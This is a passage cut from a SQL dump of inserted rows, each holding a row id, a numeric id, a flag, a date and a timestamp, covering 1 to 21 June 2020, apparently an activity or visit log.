14:05:58'),(3103,2309,1,'2020-06-01','2020-06-01 14:11:43'),(3104,80,1,'2020-06-01','2020-06-01 14:26:41'),(3105,3045,1,'2020-06-01','2020-06-01 15:12:41'),(3106,2609,1,'2020-06-01','2020-06-01 16:33:00'),(3107,2813,1,'2020-06-01','2020-06-01 18:37:12'),(3108,1582,1,'2020-06-01','2020-06-01 19:16:39'),(3109,1588,1,'2020-06-01','2020-06-01 23:03:01'),(3110,2609,1,'2020-06-02','2020-06-02 00:19:20'),(3111,1588,1,'2020-06-02','2020-06-02 00:50:10'),(3112,2309,1,'2020-06-02','2020-06-02 00:58:37'),(3113,2309,1,'2020-06-02','2020-06-02 01:04:07'),(3114,80,1,'2020-06-02','2020-06-02 02:25:17'),(3115,2609,1,'2020-06-02','2020-06-02 07:01:39'),(3116,1600,1,'2020-06-02','2020-06-02 09:13:07'),(3117,1600,1,'2020-06-02','2020-06-02 09:13:10'),(3118,1598,1,'2020-06-02','2020-06-02 09:31:46'),(3119,2813,1,'2020-06-02','2020-06-02 11:22:44'),(3120,2309,1,'2020-06-02','2020-06-02 13:31:42'),(3121,2609,1,'2020-06-02','2020-06-02 15:42:53'),(3122,72,1,'2020-06-02','2020-06-02 16:04:14'),(3123,3051,1,'2020-06-02','2020-06-02 16:04:29'),(3124,2309,1,'2020-06-02','2020-06-02 17:54:59'),(3125,2609,1,'2020-06-02','2020-06-02 19:05:11'),(3126,72,1,'2020-06-02','2020-06-02 19:50:36'),(3127,3056,1,'2020-06-02','2020-06-02 19:52:53'),(3128,72,1,'2020-06-02','2020-06-02 19:53:56'),(3129,3053,1,'2020-06-02','2020-06-02 19:55:03'),(3130,3053,1,'2020-06-02','2020-06-02 19:58:57'),(3131,72,1,'2020-06-02','2020-06-02 19:59:02'),(3132,72,1,'2020-06-02','2020-06-02 21:01:57'),(3133,3051,1,'2020-06-02','2020-06-02 21:03:07'),(3134,72,1,'2020-06-02','2020-06-02 21:12:24'),(3135,1588,1,'2020-06-02','2020-06-02 21:15:46'),(3136,2503,1,'2020-06-02','2020-06-02 21:18:26'),(3137,72,1,'2020-06-02','2020-06-02 21:20:44'),(3138,72,1,'2020-06-02','2020-06-02 21:56:05'),(3139,1588,1,'2020-06-02','2020-06-02 21:56:33'),(3140,76,1,'2020-06-02','2020-06-02 22:28:05'),(3141,80,1,'2020-06-02','2020-06-02 22:44:11'),(3142,2813,1,'2020-06-02','2020-06-02 22:47:45'),(3143,3034,1,'2020-06-02','2020-06-02 23:08:55'),(3144,2991,1,'2020-06-02','2020-06-02 23:38:51'),(3145,2457,1,'2020-06-03','2020-06-03 00:17:22'),(3146,2993,1,'2020-06-03','2020-06-03 00:39:19'),(3147,72,1,'2020-06-03','2020-06-03 02:26:25'),(3148,2609,1,'2020-06-03','2020-06-03 04:47:22'),(3149,1588,1,'2020-06-03','2020-06-03 05:48:08'),(3150,2769,1,'2020-06-03','2020-06-03 06:01:06'),(3151,2769,1,'2020-06-03','2020-06-03 06:02:49'),(3152,2769,1,'2020-06-03','2020-06-03 06:03:57'),(3153,1588,1,'2020-06-03','2020-06-03 06:27:59'),(3154,1606,1,'2020-06-03','2020-06-03 09:13:43'),(3155,2309,1,'2020-06-03','2020-06-03 14:29:29'),(3156,2309,1,'2020-06-03','2020-06-03 14:29:43'),(3157,1588,1,'2020-06-03','2020-06-03 14:39:54'),(3158,1608,1,'2020-06-03','2020-06-03 14:47:01'),(3159,468,1,'2020-06-03','2020-06-03 14:56:02'),(3160,2309,1,'2020-06-03','2020-06-03 14:57:12'),(3161,2769,1,'2020-06-03','2020-06-03 15:13:45'),(3162,80,1,'2020-06-03','2020-06-03 15:22:14'),(3163,2609,1,'2020-06-03','2020-06-03 15:25:13'),(3164,80,1,'2020-06-03','2020-06-03 15:43:18'),(3165,3045,1,'2020-06-03','2020-06-03 16:58:56'),(3166,3045,1,'2020-06-03','2020-06-03 16:59:13'),(3167,3045,1,'2020-06-03','2020-06-03 17:01:09'),(3168,3045,1,'2020-06-03','2020-06-03 17:02:32'),(3169,3034,1,'2020-06-03','2020-06-03 18:15:06'),(3170,1614,1,'2020-06-03','2020-06-03 18:50:21'),(3171,2813,1,'2020-06-03','2020-06-03 19:24:53'),(3172,2457,1,'2020-06-03','2020-06-03 19:51:15'),(3173,89,1,'2020-06-03','2020-06-03 20:41:47'),(3174,1584,1,'2020-06-03','2020-06-03 20:49:37'),(3175,1749,1,'2020-06-03','2020-06-03 20:59:00'),(3176,2178,1,'2020-06-03','2020-06-03 21:00:10'),(3177,72,1,'2020-06-03','2020-06-03 21:01:41'),(3178,1705,1,'2020-06-03','2020-06-03 21:02:51'),(3179,3060,1,'2020-06-03','2020-06-03 21:09:52'),(3180,486,1,'2020-06-03','2020-06-03 22:20:23'),(3181,488,1,'2020-06-03','2020-06-03 22:20:59'),(3182,480,1,'2020-06-03','2020-06-03 22:21:33'),(3183,84,1,'2020-06-03','2020-06-03 22:22:30'),(3184,1870,1,'2020-06-03','2020-06-03 22:26:17'),(3185,1877,1,'2020-06-03','2020-06-03 22:30:02'),(3186,1730,1,'2020-06-03','2020-06-03 23:02:51'),(3187,469,1,'2020-06-03','2020-06-03 23:49:18'),(3188,478,1,'2020-06-03','2020-06-03 23:51:33'),(3189,1594,1,'2020-06-03','2020-06-03 23:54:15'),(3190,1588,1,'2020-06-04','2020-06-04 00:33:23'),(3191,2609,1,'2020-06-04','2020-06-04 01:03:33'),(3192,2769,1,'2020-06-04','2020-06-04 01:24:46'),(3193,3034,1,'2020-06-04','2020-06-04 02:48:57'),(3194,1588,1,'2020-06-04','2020-06-04 03:45:13'),(3195,486,1,'2020-06-04','2020-06-04 04:18:18'),(3196,2813,1,'2020-06-04','2020-06-04 04:53:00'),(3197,3045,1,'2020-06-04','2020-06-04 07:26:33'),(3198,2993,1,'2020-06-04','2020-06-04 07:36:32'),(3199,1600,1,'2020-06-04','2020-06-04 08:57:07'),(3200,91,1,'2020-06-04','2020-06-04 09:16:37'),(3201,1745,1,'2020-06-04','2020-06-04 09:24:14'),(3202,1745,1,'2020-06-04','2020-06-04 09:24:44'),(3203,2148,1,'2020-06-04','2020-06-04 09:27:25'),(3204,1768,1,'2020-06-04','2020-06-04 09:27:52'),(3205,1743,1,'2020-06-04','2020-06-04 09:27:55'),(3206,1732,1,'2020-06-04','2020-06-04 09:28:09'),(3207,1707,1,'2020-06-04','2020-06-04 09:28:17'),(3208,1770,1,'2020-06-04','2020-06-04 09:28:33'),(3209,1720,1,'2020-06-04','2020-06-04 09:28:51'),(3210,1600,1,'2020-06-04','2020-06-04 09:30:21'),(3211,84,1,'2020-06-04','2020-06-04 09:39:15'),(3212,2161,1,'2020-06-04','2020-06-04 09:46:19'),(3213,2156,1,'2020-06-04','2020-06-04 09:47:14'),(3214,1747,1,'2020-06-04','2020-06-04 09:56:33'),(3215,3058,1,'2020-06-04','2020-06-04 11:41:23'),(3216,3058,1,'2020-06-04','2020-06-04 11:43:48'),(3217,3063,1,'2020-06-04','2020-06-04 13:14:08'),(3218,2609,1,'2020-06-04','2020-06-04 14:09:09'),(3219,2609,1,'2020-06-04','2020-06-04 14:41:41'),(3220,2457,1,'2020-06-04','2020-06-04 15:17:13'),(3221,68,1,'2020-06-04','2020-06-04 15:20:16'),(3222,2457,1,'2020-06-04','2020-06-04 15:21:30'),(3223,479,1,'2020-06-04','2020-06-04 16:24:44'),(3224,1588,1,'2020-06-04','2020-06-04 16:28:33'),(3225,3034,1,'2020-06-04','2020-06-04 21:35:20'),(3226,570,1,'2020-06-04','2020-06-04 21:53:13'),(3227,89,1,'2020-06-04','2020-06-04 23:49:14'),(3228,2609,1,'2020-06-05','2020-06-05 02:16:51'),(3229,1588,1,'2020-06-05','2020-06-05 02:26:57'),(3230,2813,1,'2020-06-05','2020-06-05 06:43:54'),(3231,3034,1,'2020-06-05','2020-06-05 09:15:52'),(3232,2769,1,'2020-06-05','2020-06-05 09:58:11'),(3233,2993,1,'2020-06-05','2020-06-05 10:10:45'),(3234,2609,1,'2020-06-05','2020-06-05 11:08:31'),(3235,1718,1,'2020-06-05','2020-06-05 11:32:09'),(3236,1718,1,'2020-06-05','2020-06-05 11:32:19'),(3237,1588,1,'2020-06-05','2020-06-05 13:19:22'),(3238,2609,1,'2020-06-05','2020-06-05 14:29:35'),(3239,1743,1,'2020-06-05','2020-06-05 14:39:41'),(3240,1600,1,'2020-06-05','2020-06-05 15:49:18'),(3241,91,1,'2020-06-05','2020-06-05 16:11:25'),(3242,72,1,'2020-06-05','2020-06-05 16:19:28'),(3243,2813,1,'2020-06-05','2020-06-05 16:52:07'),(3244,3034,1,'2020-06-05','2020-06-05 17:40:05'),(3245,2991,1,'2020-06-05','2020-06-05 18:10:28'),(3246,1582,1,'2020-06-05','2020-06-05 18:20:19'),(3247,2769,1,'2020-06-05','2020-06-05 19:40:48'),(3248,2309,1,'2020-06-05','2020-06-05 20:06:35'),(3249,2297,1,'2020-06-05','2020-06-05 20:49:02'),(3250,2154,1,'2020-06-05','2020-06-05 22:50:46'),(3251,68,1,'2020-06-05','2020-06-05 23:44:19'),(3252,1588,1,'2020-06-06','2020-06-06 00:30:45'),(3253,1600,1,'2020-06-06','2020-06-06 02:41:47'),(3254,72,1,'2020-06-06','2020-06-06 03:32:06'),(3255,1588,1,'2020-06-06','2020-06-06 05:53:35'),(3256,89,1,'2020-06-06','2020-06-06 06:24:40'),(3257,2813,1,'2020-06-06','2020-06-06 06:33:36'),(3258,3034,1,'2020-06-06','2020-06-06 07:23:44'),(3259,2934,1,'2020-06-06','2020-06-06 07:52:40'),(3260,2769,1,'2020-06-06','2020-06-06 09:04:26'),(3261,1751,1,'2020-06-06','2020-06-06 09:38:33'),(3262,1544,1,'2020-06-06','2020-06-06 11:08:51'),(3263,2751,1,'2020-06-06','2020-06-06 11:39:10'),(3264,2457,1,'2020-06-06','2020-06-06 12:28:34'),(3265,2609,1,'2020-06-06','2020-06-06 14:20:41'),(3266,76,1,'2020-06-06','2020-06-06 15:41:23'),(3267,84,1,'2020-06-06','2020-06-06 19:43:56'),(3268,2309,1,'2020-06-06','2020-06-06 20:12:49'),(3269,2609,1,'2020-06-06','2020-06-06 23:13:35'),(3270,87,1,'2020-06-07','2020-06-07 06:11:52'),(3271,108,1,'2020-06-07','2020-06-07 08:17:17'),(3272,108,1,'2020-06-07','2020-06-07 10:17:32'),(3273,1766,1,'2020-06-07','2020-06-07 10:17:51'),(3274,1606,1,'2020-06-07','2020-06-07 10:48:32'),(3275,108,1,'2020-06-07','2020-06-07 14:30:23'),(3276,1592,1,'2020-06-07','2020-06-07 23:47:01'),(3277,1600,1,'2020-06-08','2020-06-08 00:22:40'),(3278,108,1,'2020-06-08','2020-06-08 04:14:18'),(3279,1600,1,'2020-06-08','2020-06-08 08:11:17'),(3280,1600,1,'2020-06-08','2020-06-08 08:11:19'),(3281,1600,1,'2020-06-08','2020-06-08 08:24:35'),(3282,2769,1,'2020-06-08','2020-06-08 09:18:59'),(3283,2775,1,'2020-06-08','2020-06-08 09:29:12'),(3284,91,1,'2020-06-08','2020-06-08 10:09:37'),(3285,72,1,'2020-06-08','2020-06-08 10:27:43'),(3286,3051,1,'2020-06-08','2020-06-08 10:29:28'),(3287,72,1,'2020-06-08','2020-06-08 10:32:03'),(3288,3030,1,'2020-06-08','2020-06-08 10:49:18'),(3289,108,1,'2020-06-08','2020-06-08 11:09:18'),(3290,1600,1,'2020-06-08','2020-06-08 11:45:06'),(3291,2751,1,'2020-06-08','2020-06-08 12:51:13'),(3292,84,1,'2020-06-08','2020-06-08 12:51:48'),(3293,68,1,'2020-06-08','2020-06-08 14:04:59'),(3294,1606,1,'2020-06-08','2020-06-08 15:33:41'),(3295,80,1,'2020-06-08','2020-06-08 15:34:13'),(3296,80,1,'2020-06-08','2020-06-08 15:34:52'),(3297,1606,1,'2020-06-08','2020-06-08 15:34:56'),(3298,3030,1,'2020-06-08','2020-06-08 16:51:48'),(3299,1600,1,'2020-06-08','2020-06-08 16:57:51'),(3300,1870,1,'2020-06-09','2020-06-09 01:54:11'),(3301,91,1,'2020-06-09','2020-06-09 04:34:23'),(3302,91,1,'2020-06-09','2020-06-09 06:37:03'),(3303,1600,1,'2020-06-09','2020-06-09 09:52:34'),(3304,2410,1,'2020-06-09','2020-06-09 10:07:22'),(3305,1600,1,'2020-06-09','2020-06-09 11:26:45'),(3306,1600,1,'2020-06-09','2020-06-09 12:02:38'),(3307,72,1,'2020-06-09','2020-06-09 12:03:58'),(3308,80,1,'2020-06-09','2020-06-09 12:04:28'),(3309,72,1,'2020-06-09','2020-06-09 12:05:56'),(3310,1600,1,'2020-06-09','2020-06-09 12:06:03'),(3311,72,1,'2020-06-09','2020-06-09 12:16:27'),(3312,2410,1,'2020-06-09','2020-06-09 13:18:00'),(3313,1600,1,'2020-06-09','2020-06-09 14:04:42'),(3314,2609,1,'2020-06-09','2020-06-09 15:38:18'),(3315,1718,1,'2020-06-09','2020-06-09 16:12:38'),(3316,1600,1,'2020-06-09','2020-06-09 17:19:28'),(3317,1588,1,'2020-06-09','2020-06-09 22:47:15'),(3318,1600,1,'2020-06-09','2020-06-09 22:49:12'),(3319,1715,1,'2020-06-09','2020-06-09 22:52:54'),(3320,1600,1,'2020-06-09','2020-06-09 22:54:02'),(3321,3066,1,'2020-06-09','2020-06-09 23:21:59'),(3322,3069,1,'2020-06-09','2020-06-09 23:24:22'),(3323,2609,1,'2020-06-10','2020-06-10 00:37:54'),(3324,1604,1,'2020-06-10','2020-06-10 02:08:36'),(3325,3072,1,'2020-06-10','2020-06-10 03:13:12'),(3326,2813,1,'2020-06-10','2020-06-10 03:45:36'),(3327,72,1,'2020-06-10','2020-06-10 06:30:53'),(3328,2769,1,'2020-06-10','2020-06-10 07:42:18'),(3329,2993,1,'2020-06-10','2020-06-10 08:21:15'),(3330,1600,1,'2020-06-10','2020-06-10 09:12:37'),(3331,2609,1,'2020-06-10','2020-06-10 10:02:34'),(3332,1600,1,'2020-06-10','2020-06-10 10:48:23'),(3333,1600,1,'2020-06-10','2020-06-10 10:48:34'),(3334,2751,1,'2020-06-10','2020-06-10 12:36:26'),(3335,3063,1,'2020-06-10','2020-06-10 13:56:19'),(3336,3066,1,'2020-06-10','2020-06-10 13:57:14'),(3337,68,1,'2020-06-10','2020-06-10 14:04:41'),(3338,68,1,'2020-06-10','2020-06-10 14:05:16'),(3339,76,1,'2020-06-10','2020-06-10 14:08:14'),(3340,76,1,'2020-06-10','2020-06-10 14:08:15'),(3341,3069,1,'2020-06-10','2020-06-10 14:11:09'),(3342,3069,1,'2020-06-10','2020-06-10 14:11:10'),(3343,72,1,'2020-06-10','2020-06-10 14:13:04'),(3344,72,1,'2020-06-10','2020-06-10 14:13:05'),(3345,91,1,'2020-06-10','2020-06-10 14:13:21'),(3346,3058,1,'2020-06-10','2020-06-10 14:13:52'),(3347,335,1,'2020-06-10','2020-06-10 14:14:10'),(3348,335,1,'2020-06-10','2020-06-10 14:14:14'),(3349,108,1,'2020-06-10','2020-06-10 14:19:19'),(3350,108,1,'2020-06-10','2020-06-10 14:19:22'),(3351,2503,1,'2020-06-10','2020-06-10 14:22:31'),(3352,2503,1,'2020-06-10','2020-06-10 14:23:27'),(3353,91,1,'2020-06-10','2020-06-10 14:27:18'),(3354,2813,1,'2020-06-10','2020-06-10 14:34:03'),(3355,91,1,'2020-06-10','2020-06-10 14:37:19'),(3356,473,1,'2020-06-10','2020-06-10 14:57:58'),(3357,474,1,'2020-06-10','2020-06-10 15:22:54'),(3358,3069,1,'2020-06-10','2020-06-10 15:32:40'),(3359,1718,1,'2020-06-10','2020-06-10 16:13:05'),(3360,72,1,'2020-06-10','2020-06-10 17:41:52'),(3361,2609,1,'2020-06-10','2020-06-10 18:16:40'),(3362,2609,1,'2020-06-10','2020-06-10 19:06:25'),(3363,1604,1,'2020-06-10','2020-06-10 19:26:44'),(3364,2991,1,'2020-06-10','2020-06-10 22:08:43'),(3365,3045,1,'2020-06-10','2020-06-10 23:38:54'),(3366,2309,1,'2020-06-10','2020-06-10 23:45:50'),(3367,68,1,'2020-06-10','2020-06-10 23:48:46'),(3368,1582,1,'2020-06-10','2020-06-10 23:58:57'),(3369,2457,1,'2020-06-11','2020-06-11 01:09:25'),(3370,89,1,'2020-06-11','2020-06-11 05:08:34'),(3371,486,1,'2020-06-11','2020-06-11 05:30:53'),(3372,486,1,'2020-06-11','2020-06-11 06:55:04'),(3373,2609,1,'2020-06-11','2020-06-11 06:55:39'),(3374,1743,1,'2020-06-11','2020-06-11 07:07:11'),(3375,1743,1,'2020-06-11','2020-06-11 07:07:59'),(3376,2609,1,'2020-06-11','2020-06-11 08:26:25'),(3377,1600,1,'2020-06-11','2020-06-11 08:57:32'),(3378,1600,1,'2020-06-11','2020-06-11 10:22:39'),(3379,2309,1,'2020-06-11','2020-06-11 14:49:12'),(3380,2309,1,'2020-06-11','2020-06-11 14:53:27'),(3381,2609,1,'2020-06-11','2020-06-11 19:39:30'),(3382,1582,1,'2020-06-11','2020-06-11 19:55:25'),(3383,1582,1,'2020-06-11','2020-06-11 20:02:20'),(3384,3030,1,'2020-06-11','2020-06-11 20:28:59'),(3385,1604,1,'2020-06-11','2020-06-11 23:45:54'),(3386,2813,1,'2020-06-12','2020-06-12 00:34:17'),(3387,1604,1,'2020-06-12','2020-06-12 00:47:42'),(3388,1582,1,'2020-06-12','2020-06-12 03:33:55'),(3389,2609,1,'2020-06-12','2020-06-12 05:14:05'),(3390,84,1,'2020-06-12','2020-06-12 08:31:18'),(3391,76,1,'2020-06-12','2020-06-12 10:26:02'),(3392,2457,1,'2020-06-12','2020-06-12 11:06:03'),(3393,2150,1,'2020-06-12','2020-06-12 11:34:19'),(3394,68,1,'2020-06-12','2020-06-12 13:27:13'),(3395,76,1,'2020-06-12','2020-06-12 13:27:32'),(3396,1614,1,'2020-06-12','2020-06-12 14:26:18'),(3397,2911,1,'2020-06-12','2020-06-12 14:29:26'),(3398,2609,1,'2020-06-12','2020-06-12 14:57:14'),(3399,2309,1,'2020-06-12','2020-06-12 15:47:08'),(3400,2309,1,'2020-06-12','2020-06-12 15:48:08'),(3401,84,1,'2020-06-12','2020-06-12 15:57:07'),(3402,570,1,'2020-06-12','2020-06-12 15:57:35'),(3403,1877,1,'2020-06-12','2020-06-12 16:00:17'),(3404,1614,1,'2020-06-12','2020-06-12 16:22:48'),(3405,1614,1,'2020-06-12','2020-06-12 16:23:47'),(3406,1614,1,'2020-06-12','2020-06-12 16:23:48'),(3407,87,1,'2020-06-12','2020-06-12 16:50:16'),(3408,474,1,'2020-06-12','2020-06-12 16:51:11'),(3409,89,1,'2020-06-12','2020-06-12 16:59:29'),(3410,1614,1,'2020-06-12','2020-06-12 16:59:57'),(3411,1730,1,'2020-06-12','2020-06-12 19:18:37'),(3412,72,1,'2020-06-12','2020-06-12 21:24:54'),(3413,72,1,'2020-06-12','2020-06-12 22:12:35'),(3414,1610,1,'2020-06-12','2020-06-12 22:13:48'),(3415,2609,1,'2020-06-13','2020-06-13 01:00:16'),(3416,1726,1,'2020-06-13','2020-06-13 03:31:26'),(3417,1730,1,'2020-06-13','2020-06-13 04:11:25'),(3418,2410,1,'2020-06-13','2020-06-13 04:48:56'),(3419,570,1,'2020-06-13','2020-06-13 10:10:10'),(3420,80,1,'2020-06-13','2020-06-13 13:37:27'),(3421,72,1,'2020-06-13','2020-06-13 13:45:51'),(3422,2154,1,'2020-06-13','2020-06-13 14:27:14'),(3423,1588,1,'2020-06-13','2020-06-13 15:36:52'),(3424,1588,1,'2020-06-13','2020-06-13 15:37:01'),(3425,2801,1,'2020-06-13','2020-06-13 16:26:40'),(3426,2609,1,'2020-06-13','2020-06-13 17:09:11'),(3427,76,1,'2020-06-13','2020-06-13 17:16:30'),(3428,91,1,'2020-06-13','2020-06-13 17:16:59'),(3429,2609,1,'2020-06-13','2020-06-13 17:18:34'),(3430,80,1,'2020-06-13','2020-06-13 18:27:42'),(3431,1730,1,'2020-06-13','2020-06-13 19:17:11'),(3432,2609,1,'2020-06-13','2020-06-13 20:37:12'),(3433,1588,1,'2020-06-13','2020-06-13 22:30:10'),(3434,1730,1,'2020-06-14','2020-06-14 04:20:09'),(3435,335,1,'2020-06-14','2020-06-14 05:10:18'),(3436,2457,1,'2020-06-14','2020-06-14 05:20:29'),(3437,1582,1,'2020-06-14','2020-06-14 05:50:27'),(3438,1741,1,'2020-06-14','2020-06-14 06:36:09'),(3439,3069,1,'2020-06-14','2020-06-14 07:53:46'),(3440,335,1,'2020-06-14','2020-06-14 07:58:06'),(3441,87,1,'2020-06-14','2020-06-14 08:31:58'),(3442,91,1,'2020-06-14','2020-06-14 08:32:50'),(3443,87,1,'2020-06-14','2020-06-14 08:34:31'),(3444,68,1,'2020-06-14','2020-06-14 08:34:36'),(3445,2309,1,'2020-06-14','2020-06-14 08:50:49'),(3446,2309,1,'2020-06-14','2020-06-14 10:41:29'),(3447,1588,1,'2020-06-14','2020-06-14 11:35:40'),(3448,2609,1,'2020-06-14','2020-06-14 11:51:20'),(3449,1730,1,'2020-06-14','2020-06-14 12:51:31'),(3450,3051,1,'2020-06-14','2020-06-14 17:52:46'),(3451,2309,1,'2020-06-14','2020-06-14 19:52:22'),(3452,1612,1,'2020-06-15','2020-06-15 02:03:24'),(3453,2748,1,'2020-06-15','2020-06-15 02:03:52'),(3454,1612,1,'2020-06-15','2020-06-15 02:04:16'),(3455,2309,1,'2020-06-15','2020-06-15 06:58:06'),(3456,2609,1,'2020-06-15','2020-06-15 09:32:39'),(3457,2309,1,'2020-06-15','2020-06-15 09:39:28'),(3458,89,1,'2020-06-15','2020-06-15 13:09:20'),(3459,1614,1,'2020-06-15','2020-06-15 13:12:04'),(3460,108,1,'2020-06-15','2020-06-15 13:18:28'),(3461,84,1,'2020-06-15','2020-06-15 13:19:41'),(3462,1877,1,'2020-06-15','2020-06-15 13:20:01'),(3463,84,1,'2020-06-15','2020-06-15 13:20:35'),(3464,91,1,'2020-06-15','2020-06-15 13:40:57'),(3465,3076,1,'2020-06-15','2020-06-15 13:41:26'),(3466,3076,1,'2020-06-15','2020-06-15 13:42:52'),(3467,91,1,'2020-06-15','2020-06-15 13:43:16'),(3468,3076,1,'2020-06-15','2020-06-15 13:43:40'),(3469,91,1,'2020-06-15','2020-06-15 13:43:44'),(3470,91,1,'2020-06-15','2020-06-15 13:47:33'),(3471,3076,1,'2020-06-15','2020-06-15 13:47:52'),(3472,3076,1,'2020-06-15','2020-06-15 13:48:02'),(3473,91,1,'2020-06-15','2020-06-15 13:50:50'),(3474,3076,1,'2020-06-15','2020-06-15 13:51:04'),(3475,91,1,'2020-06-15','2020-06-15 13:52:31'),(3476,3076,1,'2020-06-15','2020-06-15 13:52:46'),(3477,91,1,'2020-06-15','2020-06-15 13:53:48'),(3478,91,1,'2020-06-15','2020-06-15 14:03:35'),(3479,3079,1,'2020-06-15','2020-06-15 14:07:28'),(3480,91,1,'2020-06-15','2020-06-15 14:16:42'),(3481,3081,1,'2020-06-15','2020-06-15 14:16:58'),(3482,3079,1,'2020-06-15','2020-06-15 14:34:28'),(3483,3081,1,'2020-06-15','2020-06-15 14:43:08'),(3484,72,1,'2020-06-15','2020-06-15 14:47:20'),(3485,91,1,'2020-06-15','2020-06-15 14:47:26'),(3486,3079,1,'2020-06-15','2020-06-15 14:47:54'),(3487,91,1,'2020-06-15','2020-06-15 14:48:36'),(3488,3081,1,'2020-06-15','2020-06-15 14:48:49'),(3489,1724,1,'2020-06-15','2020-06-15 15:11:29'),(3490,570,1,'2020-06-15','2020-06-15 17:42:06'),(3491,1722,1,'2020-06-15','2020-06-15 22:09:52'),(3492,84,1,'2020-06-15','2020-06-15 22:10:38'),(3493,91,1,'2020-06-15','2020-06-15 22:11:20'),(3494,1718,1,'2020-06-15','2020-06-15 22:13:55'),(3495,91,1,'2020-06-15','2020-06-15 22:15:42'),(3496,2609,1,'2020-06-15','2020-06-15 22:34:35'),(3497,2309,1,'2020-06-15','2020-06-15 23:55:19'),(3498,1730,1,'2020-06-16','2020-06-16 02:46:27'),(3499,335,1,'2020-06-16','2020-06-16 03:06:59'),(3500,3006,1,'2020-06-16','2020-06-16 03:57:46'),(3501,570,1,'2020-06-16','2020-06-16 11:03:50'),(3502,3041,1,'2020-06-16','2020-06-16 15:19:29'),(3503,1606,1,'2020-06-16','2020-06-16 15:31:59'),(3504,1606,1,'2020-06-16','2020-06-16 15:32:36'),(3505,1588,1,'2020-06-16','2020-06-16 16:15:10'),(3506,1588,1,'2020-06-16','2020-06-16 16:15:32'),(3507,1588,1,'2020-06-16','2020-06-16 16:21:23'),(3508,2801,1,'2020-06-16','2020-06-16 19:17:44'),(3509,3058,1,'2020-06-16','2020-06-16 20:06:32'),(3510,91,1,'2020-06-16','2020-06-16 20:20:37'),(3511,2991,1,'2020-06-16','2020-06-16 20:21:40'),(3512,91,1,'2020-06-16','2020-06-16 20:21:57'),(3513,1707,1,'2020-06-16','2020-06-16 20:22:42'),(3514,91,1,'2020-06-16','2020-06-16 20:22:45'),(3515,1713,1,'2020-06-16','2020-06-16 20:23:09'),(3516,91,1,'2020-06-16','2020-06-16 20:23:55'),(3517,80,1,'2020-06-16','2020-06-16 20:26:45'),(3518,80,1,'2020-06-16','2020-06-16 20:31:18'),(3519,80,1,'2020-06-16','2020-06-16 20:37:33'),(3520,2775,1,'2020-06-17','2020-06-17 09:26:50'),(3521,1600,1,'2020-06-17','2020-06-17 10:31:04'),(3522,1600,1,'2020-06-17','2020-06-17 10:32:07'),(3523,89,1,'2020-06-17','2020-06-17 11:40:47'),(3524,1614,1,'2020-06-17','2020-06-17 11:41:00'),(3525,1612,1,'2020-06-17','2020-06-17 11:53:26'),(3526,72,1,'2020-06-17','2020-06-17 11:58:10'),(3527,89,1,'2020-06-17','2020-06-17 12:28:02'),(3528,3083,1,'2020-06-17','2020-06-17 12:28:20'),(3529,89,1,'2020-06-17','2020-06-17 12:37:56'),(3530,1582,1,'2020-06-17','2020-06-17 12:38:04'),(3531,89,1,'2020-06-17','2020-06-17 12:38:20'),(3532,3083,1,'2020-06-17','2020-06-17 12:38:32'),(3533,89,1,'2020-06-17','2020-06-17 12:57:19'),(3534,1614,1,'2020-06-17','2020-06-17 12:57:28'),(3535,91,1,'2020-06-17','2020-06-17 14:32:32'),(3536,1600,1,'2020-06-17','2020-06-17 16:58:01'),(3537,1774,1,'2020-06-17','2020-06-17 17:00:46'),(3538,2309,1,'2020-06-17','2020-06-17 19:35:26'),(3539,2309,1,'2020-06-17','2020-06-17 19:35:59'),(3540,474,1,'2020-06-17','2020-06-17 20:19:23'),(3541,84,1,'2020-06-17','2020-06-17 20:22:39'),(3542,68,1,'2020-06-17','2020-06-17 20:22:40'),(3543,1877,1,'2020-06-17','2020-06-17 20:24:31'),(3544,87,1,'2020-06-17','2020-06-17 20:25:02'),(3545,488,1,'2020-06-17','2020-06-17 20:25:12'),(3546,482,1,'2020-06-17','2020-06-17 20:25:31'),(3547,479,1,'2020-06-17','2020-06-17 20:25:48'),(3548,486,1,'2020-06-18','2020-06-18 07:25:17'),(3549,486,1,'2020-06-18','2020-06-18 07:55:16'),(3550,1600,1,'2020-06-18','2020-06-18 08:55:16'),(3551,1600,1,'2020-06-18','2020-06-18 10:17:16'),(3552,2457,1,'2020-06-18','2020-06-18 11:33:49'),(3553,479,1,'2020-06-18','2020-06-18 12:41:55'),(3554,72,1,'2020-06-18','2020-06-18 14:27:55'),(3555,3051,1,'2020-06-18','2020-06-18 14:28:25'),(3556,72,1,'2020-06-18','2020-06-18 14:31:04'),(3557,3051,1,'2020-06-18','2020-06-18 14:31:34'),(3558,2457,1,'2020-06-18','2020-06-18 14:38:22'),(3559,2609,1,'2020-06-18','2020-06-18 15:09:14'),(3560,3030,1,'2020-06-18','2020-06-18 16:15:02'),(3561,91,1,'2020-06-18','2020-06-18 17:13:16'),(3562,2309,1,'2020-06-18','2020-06-18 19:55:27'),(3563,474,1,'2020-06-19','2020-06-19 07:20:12'),(3564,68,1,'2020-06-19','2020-06-19 07:20:49'),(3565,84,1,'2020-06-19','2020-06-19 07:24:23'),(3566,1877,1,'2020-06-19','2020-06-19 07:24:30'),(3567,479,1,'2020-06-19','2020-06-19 07:26:58'),(3568,76,1,'2020-06-19','2020-06-19 07:30:22'),(3569,84,1,'2020-06-19','2020-06-19 08:05:56'),(3570,3069,1,'2020-06-19','2020-06-19 09:06:38'),(3571,1604,1,'2020-06-19','2020-06-19 09:42:47'),(3572,1604,1,'2020-06-19','2020-06-19 09:44:46'),(3573,3069,1,'2020-06-19','2020-06-19 12:05:28'),(3574,2457,1,'2020-06-19','2020-06-19 12:18:06'),(3575,1582,1,'2020-06-19','2020-06-19 12:18:35'),(3576,3069,1,'2020-06-19','2020-06-19 12:33:06'),(3577,87,1,'2020-06-19','2020-06-19 12:39:24'),(3578,1718,1,'2020-06-19','2020-06-19 13:46:59'),(3579,2904,1,'2020-06-19','2020-06-19 16:21:52'),(3580,102,1,'2020-06-19','2020-06-19 18:01:40'),(3581,1722,1,'2020-06-19','2020-06-19 22:48:45'),(3582,2617,1,'2020-06-20','2020-06-20 03:33:31'),(3583,72,1,'2020-06-20','2020-06-20 23:12:21'),(3584,3053,1,'2020-06-20','2020-06-20 23:13:28'),(3585,91,1,'2020-06-21','2020-06-21 02:22:21'),(3586,1730,1,'2020-06-21','2020-06-21 04:44:18'),(3587,2309,1,'2020-06-21','2020-06-21 07:05:45'),(3588,1600,1,'2020-06-21','2020-06-21 08:08:44'),(3589,1600,1,'2020-06-21','2020-06-21 10:20:31'),(3590,2154,1,'2020-06-21','2020-06-21 10:42:30'),(3591,2956,1,'2020-06-21','2020-06-21 